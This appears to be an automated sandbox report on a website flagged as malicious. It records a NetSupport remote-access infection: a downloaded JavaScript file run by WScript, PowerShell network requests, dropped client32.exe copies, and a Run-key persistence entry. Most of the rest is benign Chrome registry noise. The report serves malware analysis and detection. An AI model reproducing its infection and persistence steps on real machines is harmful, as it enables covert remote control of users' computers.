Analysis Overview
Threat Level: Known bad
The file http://blawx.com was found to be: Known bad.
Malicious Activity Summary
NetSupport
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Enumerates physical storage devices
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-24 20:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-24 20:43
Reported
2024-01-24 20:49
Platform
win10-20231215-en
Max time kernel
359s
Max time network
368s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000\Software\Microsoft\Windows\CurrentVersion\Run\OFFICE = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX911\\client32.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133506026383362281" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://blawx.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc960f9758,0x7ffc960f9768,0x7ffc960f9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2700 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2816 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4780 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL63351.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
